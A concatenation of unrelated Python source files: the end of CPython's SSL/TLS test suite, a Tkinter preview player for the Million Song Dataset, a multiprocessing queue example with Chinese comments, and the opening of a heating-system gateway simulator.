port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
ssl.wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = ssl.wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.recv(1)
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup and perform a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_default_ciphers(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
try:
# Force a set of weak ciphers on our client context
context.set_ciphers("DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_SSLv23,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", str(server.conn_errors[0]))
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1')
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.load_cert_chain(CERTFILE)
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got channel binding data: {0!r}\n"
.format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
s.close()
# now, again
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got another channel binding data: {0!r}\n"
.format(new_cb_data))
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
s.close()
def test_compression(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.load_dh_params(DHFILE)
context.set_ciphers("kEDH")
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_verify_locations(CERTFILE)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
client_context.load_cert_chain(CERTFILE)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True)
except ssl.SSLError as e:
stats = e
if (expected is None and IS_OPENSSL_1_1
and ssl.OPENSSL_VERSION_INFO < (1, 1, 0, 6)):
# OpenSSL 1.1.0 to 1.1.0e raises handshake error
self.assertIsInstance(stats, ssl.SSLError)
else:
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_npn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, 'localhost')
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, 'localhost')
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_shared_ciphers(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 2):
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
alg1 = "AES256"
alg2 = "AES-256"
else:
client_context.set_ciphers("AES:3DES")
server_context.set_ciphers("3DES")
alg1 = "3DES"
alg2 = "DES-CBC3"
stats = server_params_test(client_context, server_context)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not alg1 in name.split("-") and alg2 not in name:
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket())
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(support.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
with open(support.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_main(verbose=False):
if support.verbose:
import warnings
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
with warnings.catch_warnings():
warnings.filterwarnings(
'ignore',
'dist\(\) and linux_distribution\(\) '
'functions are deprecated .*',
PendingDeprecationWarning,
)
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, REMOTE_ROOT_CERT, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
tests.append(NetworkedBIOTests)
if _have_threads:
thread_info = support.threading_setup()
if thread_info:
tests.append(ThreadedTests)
try:
support.run_unittest(*tests)
finally:
if _have_threads:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
player_7digital.py
|
"""
Thierry Bertin-Mahieux (2010) Columbia University
tb2332@columbia.edu
This code uses 7digital API and info contained in HDF5 song
file to get a preview URL and play it.
It can be used to quickly listen to a song in the dataset.
The goal is to be able to search songs by artist name, title,
or Echo Nest ID.
This is part of the Million Song Dataset project from
LabROSA (Columbia University) and The Echo Nest.
Copyright 2010, Thierry Bertin-Mahieux
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import os
import sys
import time
import glob
import urllib
import urllib2
import sqlite3
import numpy as np
import threading
import get_preview_url as GETURL
try:
from Tkinter import *
except ImportError:
print 'you need Tkinter installed!'
sys.exit(0)
try:
import ao
except ImportError:
print 'you need pyao installed!'
sys.exit(0)
try:
import mad
except ImportError:
print 'you need pymad installed!'
sys.exit(0)
# sampling rate from 7 digital
DIGITAL7SRATE=22500
def encode_string(s):
"""
Simple utility function to make sure a string is proper
to be used in a SQLite query
(different than posgtresql, no N to specify unicode)
EXAMPLE:
That's my boy! -> 'That''s my boy!'
"""
return "'"+s.replace("'","''")+"'"
class PlayerApp(Frame):
"""
MAIN CLASS, contains the Tkinter app
"""
def __init__(self, master=None, tmdb=None, url=''):
"""
Contstructor
INPUTS
tmdb - path to track_metadata.db (containing track_7digitalid)
url - more for debugging, starts with a loaded url
"""
Frame.__init__(self, master)
# verbose
self.verbose=1
# some class variables
self.curr_track_id = None
self.is_playing = False
# db conn
self.tmdb = tmdb
self.conn_tmdb = sqlite3.connect(tmdb) if tmdb else None
# grid and size
self.grid(sticky=N+S+E+W)
self.config(height=300,width=500)
self.columnconfigure(0,minsize=60)
self.grid_propagate(0)
# add objects
self.createButtons()
self.createSearchFields()
self.createListBoxes()
# read url
self.url = url
def __del__(self):
""" DESTRUCTOR """
if not self.conn_tmdb is None:
self.conn_tmdb.close()
def createButtons(self):
# quit
self.quitButton = Button(self, text='Quit', command=self.do_quit)
self.quitButton.grid(row=0,column=0,sticky=N+S+E+W)
# search EN ID
self.searchidButton = Button(self, text='Search by EN id', command=self.search_enid)
self.searchidButton.grid(row=4,column=1,sticky=N+S+E+W)
# search artist name
self.searchTitleButton = Button(self, text='Search by Artist/Title', command=self.search_title)
self.searchTitleButton.grid(row=5,column=3,sticky=N+S+E+W)
# play
self.playButton = Button(self,text='play', command=self.play_thread)
self.playButton.grid(row=7,column=1,sticky=N+S+E+W)
# stop
self.stopButton = Button(self,text='stop', command=self.stop)
self.stopButton.grid(row=7,column=2,sticky=N+S+E+W)
def createSearchFields(self):
# search Echo Nest ID
self.entryENID = Entry(self)
self.entryENID.grid(row=3,column=1,sticky=N+S+E+W)
# search artist + title
self.entryArtist = Entry(self)
self.entryArtist.grid(row=3,column=3,sticky=N+S+E+W)
self.entryTitle = Entry(self)
self.entryTitle.grid(row=4,column=3,sticky=N+S+E+W)
def createListBoxes(self):
# vertical scrollbar
self.yScroll = Scrollbar(self,orient=VERTICAL)
self.yScroll.grid(row=6,column=5,sticky=N+S)
# listbox
self.listboxResult = Listbox(self,yscrollcommand=self.yScroll.set)
self.listboxResult.grid(row=6,column=1,columnspan=4,
sticky=N+S+E+W)
self.listboxResult.exportselection = 0 # prevent copy past
self.listboxResult.selectmode = SINGLE # one line at a time
#************************* COMMANDS FOR BUTTONS *******************#
def update_display(self):
""" update the main display (ListBox) from a given track_id """
if self.curr_track_id is None:
print "no current track id"
conn = sqlite3.connect(self.tmdb)
q = "SELECT artist_name,title FROM songs WHERE track_id='"+self.curr_track_id+"' LIMIT 1"
res = conn.execute(q)
data = res.fetchone()
conn.close()
self.listboxResult.insert(0,'**************************')
self.listboxResult.insert(1,data[0])
self.listboxResult.insert(2,data[1])
self.listboxResult.insert(3,self.curr_track_id)
if self.url:
self.listboxResult.insert(4,self.url)
def search_title(self):
""" search using artist name and title """
aname = self.entryArtist.get().strip()
title = self.entryTitle.get().strip()
if aname == '' or title == '':
print 'Empty artist or title field:',aname,'/',title
return
# search
q = "SELECT track_7digitalid,track_id FROM songs WHERE artist_name="+encode_string(aname)
q += " AND title="+encode_string(title)+" LIMIT 1"
res = self.conn_tmdb.execute(q)
d7id = res.fetchone()
if len(d7id) == 0 or d7id[0] == 0:
print 'Sorry, we do not have the 7digital track ID for this one'
return
self.url = self.get_url_thread(d7id[0])
self.curr_track_id = d7id[1]
def search_enid(self):
""" search for a song by its trackid or songid """
tid = self.entryENID.get().strip().upper()
if len(tid) != 18:
print 'WRONG ECHO NEST ID:',tid,'(length='+str(len(tid))+')'
return
if tid[:2] != 'TR' and tid[:2] != 'SO':
print 'WRONG ECHO NEST ID:',tid,'(should start by TR or SO)'
return
# we got an id, lets go
if tid[:2] == 'TR':
q = "SELECT track_7digitalid,track_id FROM songs WHERE track_id='"+tid+"' LIMIT 1"
res = self.conn_tmdb.execute(q)
d7id = res.fetchone()
else:
q = "SELECT track_7digitalid,track_id FROM songs WHERE song_id='"+tid+"' LIMIT 1"
res = self.conn_tmdb.execute(q)
d7id = res.fetchone()
print 'for',tid,'we found 7digital track id:',d7id
if len(d7id) == 0 or d7id[0] == 0:
print 'Sorry, we do not have the 7digital track ID for this one'
return
self.url = self.get_url_thread(d7id[0])
self.curr_track_id = d7id[1]
def get_url_thread(self,d7id):
""" launch 'get_url' as a thread, button does not stay pressed """
t = threading.Thread(target=self.get_url,args=(d7id,))
t.start()
def get_url(self,d7id):
""" get an url from a 7digital track id """
url = GETURL.get_preview_from_trackid(d7id)
print 'Found url:',url
self.url = url
self.update_display() # update main display
def do_quit(self):
""" quit but close stream before """
self.stop()
self.quit()
def stop(self):
self.do_stop = True
def play_thread(self):
""" launch 'play' as a thread, button does not stay pressed """
t = threading.Thread(target=self.play)
t.start()
def play(self):
"""
Main function that plays a 7digital url
"""
if self.url == '':
return
if self.is_playing:
return
self.is_playing = True
self.do_stop = False
self.printinfo('start playing url:',self.url)
#urldata = urllib.urlretrieve(self.url)
urlstream = urllib2.urlopen(self.url)
mf = mad.MadFile(urlstream)
# if bits=32, too fast
self.dev = ao.AudioDevice('alsa', bits=16, rate=mf.samplerate(),channels=2)
buf = mf.read()
t1 = time.time()
while buf != None and not self.do_stop:
# len(buf) is 4608
self.dev.play(buf, len(buf))
buf = mf.read()
self.do_stop = False
self.is_playing = False
tlag = time.time() - t1
self.printinfo('done playing url after',str(int(tlag)),'seconds')
def printinfo(self,*msg):
""" print message if verbose """
if self.verbose>0:
s = 'INFO:'
for k in msg:
s += ' ' + str(k)
print s
def launch_applet(tmdb=None,url=''):
"""
Should be the main function to launch the interface
"""
app = PlayerApp(tmdb=tmdb,url=url)
app.master.title("7digital Player for the Million Song Dataset")
app.mainloop()
def die_with_usage():
""" HELP MENU """
print 'player_7digital.py'
print ' by T. Bertin-Mahieux (2011) Columbia University'
print ' tb2332@columbia.edu'
print 'Small interface to the 7digital service.'
print 'INPUT'
print ' python player_7digital.py track_metadata.db'
print 'REQUIREMENTS'
print ' * 7digital key in your environment as: DIGITAL7_API_KEY'
print ' * pyao'
print ' * pymad'
print ' * Tkinter for python'
print ' * track_metadata.db (new one with 7digital ids, check website)'
sys.exit(0)
if __name__ == '__main__':
# help menu
if len(sys.argv) < 2:
die_with_usage()
# check track metadata, makes sure it's the new version
# with track_7digitalid
tmdb = sys.argv[1]
if not os.path.isfile(tmdb):
print 'ERROR: file',tmdb,'does not exist.'
sys.exit(0)
conn = sqlite3.connect(tmdb)
try:
res = conn.execute("SELECT track_7digitalid FROM songs LIMIT 1")
data = res.fetchone()
except sqlite3.OperationalError:
print 'ERROR: do you have the old track_metadata.db?'
print ' get the new one with 7digital ids on the Million Song Dataset website'
sys.exit(0)
finally:
conn.close()
# launch interface
url = ''
launch_applet(tmdb=tmdb,url=url)
|
queue1_20_3_2.py
|
#!/usr/bin/env python3
# -*- coding:UTF-8 -*-
# 两个使用者和生产者进程
import multiprocessing
import time
def consumer(input_q):
while True:
item = input_q.get()
print(item) #可以换成实际的处理工作
input_q.task_done()
time.sleep(1)
def producer(seq,output_q):
for item in seq:
output_q.put(item)
if __name__ == '__main__':
q = multiprocessing.JoinableQueue() #共享队列
cons_p1 = multiprocessing.Process(name = "P1", target=consumer, args=(q,))
cons_p1.daemon = True # 主进程结束,它也结束,否则一直运行下去
cons_p1.start()
cons_p2 = multiprocessing.Process(name = "P2", target=consumer, args=(q,))
cons_p2.daemon = True
cons_p2.start()
seq = range(100)
producer(seq, q)
q.join() # 等待队列项目消耗完毕,如何获得通知?q.taskdone
print("Main Terminated.")
|
gateway.py
|
from time import sleep
import numpy as np
import math
import random
from datetime import datetime, timedelta, timezone
import paho.mqtt.client as mqtt
import threading
import ssl
#import json # only for debug of control_execute_schedule
#import requests
#import pycurl
#import httplib
#import urllib
import utils
import chpunit
import gasheater
import controlvalve
import heatingcurve
import storagetank
import timestep
import predict_thermal
import requests
import json
import platformcontroller
########################################################################
class GatewaySystem():
""" simulator of the gateway box """
# ==================================================================
# constructor method with instance variables
def __init__(self, t_initial):
# initialize everyone
# outputs
self.p_atm = 0.1 * 1.01325 # in Pa
self.t1 = self.t2 = self.t3 = self.t4 = self.t5 = self.t6 = self.t7 = self.t8 = self.t9 = self.t10 = t_initial
self.t11 = self.t12 = self.t13 = self.t14 = self.t15 = self.t16 = self.t17 = self.t18 = self.t19 = self.t20 = t_initial
self.t21 = self.t22 = self.t23 = self.t24 = self.t25 = self.t26 = self.t27 = self.t28 = self.t29 = self.t30 = t_initial
self.V_1 = self.V_2 = self.V_3 = self.V_4 = 0.0 # in m3/s
self.Z_1 = self.Z_2 = 0.0 # double - gas consumption in ...
self.Wh1 = self.Wh2 = self.Wh3 = 0.0 # double - electricity consumption/production in kWh
# miscallenaous
self.too_cold = 0 # flag 0, 1
self.t_initial = t_initial # double - temperature in °C
# sending of monitoring data
self.next_sending_timestamp = 0 # time at which the data is to be sent to the platform
# prediction
self.next_prediction_timestamp = 0 # time at which the prediction of the energy vector is to be made
self.prediction_time_step_in_s = 0 # time intervall at which the energy vector is to be produced
self.output_horizon_in_h = 0 # time horizont for which the forecast is to be made
self.output_resolution_in_s = 0 # resolution of the forecast in s
# schedule
self.current_schedule = 0 # schedule := list of dicts
self.schedule_changed = True # flag for schedule change
self.tau_end = 0 # datetime - end of the current time slot
self.tau_off = 0 # datetime - till this time the self.E_produced_in_kWh will supposedly reach schedule
self.e_produced_in_kWh = 0 # double - aggregated production already realised in this time slot
self.e_to_prod_in_kWh = 0 # double - envisioned production in this time slot
self.production = [] # list of dicts - contains production data for the last timestep
self.sched_idx = -1 # index in list of dicts
# appliances
self.storage_tank = 0 # object
self.chp = 0 # object
self.boiler = 0 # object
self.heizkurve = 0 # object
self.rod_stat = 0 # double - value from 0 to 1. 0 is no power = no heat input into tank; 1 is full power input into tank
self.tsm = 0 # object
self.keep_chp_on = False # control flag to keep operating CHP as long as possible
self.keep_chp_off = False # control flag to refrain from operating CHP as long as possible
# control algorithm
self.temp_dhw = 55.0 # minimal allowed temperature of the domestic hot water + temperature difference due to the cooling in the pipes
self.temp_a_hp = 15.0 # boundary ambient air temperature for the heating period
self.temp_hot = 70.0 # boundary heating water temperature - hot water
self.temp_warm = 50.0 # boundary heating water temperature - warm water
self.ctrl_option = 1 # defines how hard the schedule should be realised
# 1 - be conservative and do not allow the tank to unload completely ==> no risk of not reaching room or dhw temperature
# 2 - allow the storage tank to become fully unloaded ==> risk of not reaching the room or dhw temperature
self.unload = False
self.tank_state = 0
self.dhw_prod = 0
# provisioning and multi gateway platform mode
self.time_data = {'valid': False}
self.receiver_on = False
self.demo_on = False
# actual electricity consumption = the other electricity consumption = Wh3 - (Wh2 + Wh1)
self.electricity_consumption_kWh = 0.0
# mqtt configuration for sending data to the platform
self.mqtt_client = 0
self.mqtt_client_initialized = False
self.mqtt_broker = 0
self.mqtt_port_nr = 0
self.mqtt_api_key = 0
self.mqtt_sensor_name = 0
self.mqtt_commands = 0
self.mqtt_attributes = 0
self.mqtt_client_name = 0
# mqtt configuration for subscription to data from demonstrator
self.got_demo_data = False
self.tni = 0.0
self.coef = 0.0
#self.mqtt_client_name_cmd = 0
self.q_in_kW = 0
# Sperrzeiten
self.sp_active = False
self.sp_start = []
self.sp_end = []
# debug flag
# 0 - no output, only warnings and errors; 1 - communication with platform; 2 - write files; 3 - calculation vs. sending frequency thats neededfor demo
self.dbg = 0 # integer
self.dbg_path = "."
# #print('t1 = {}'.format(self.t1))
#end __init__
# ==================================================================
def get_storage_tank(self):
return self.storage_tank
# ==================================================================
def get_energy_left_to_tmax(self, tmax):
return self.storage_tank.calc_energy_left_to_tmax(tmax)
# ==================================================================
def get_max_temp_of_chp(self):
return self.chp.get_max_temp_of_chp()
# ==================================================================
def get_out_temp_of_gb(self):
return self.boiler.get_out_temp()
# ==================================================================
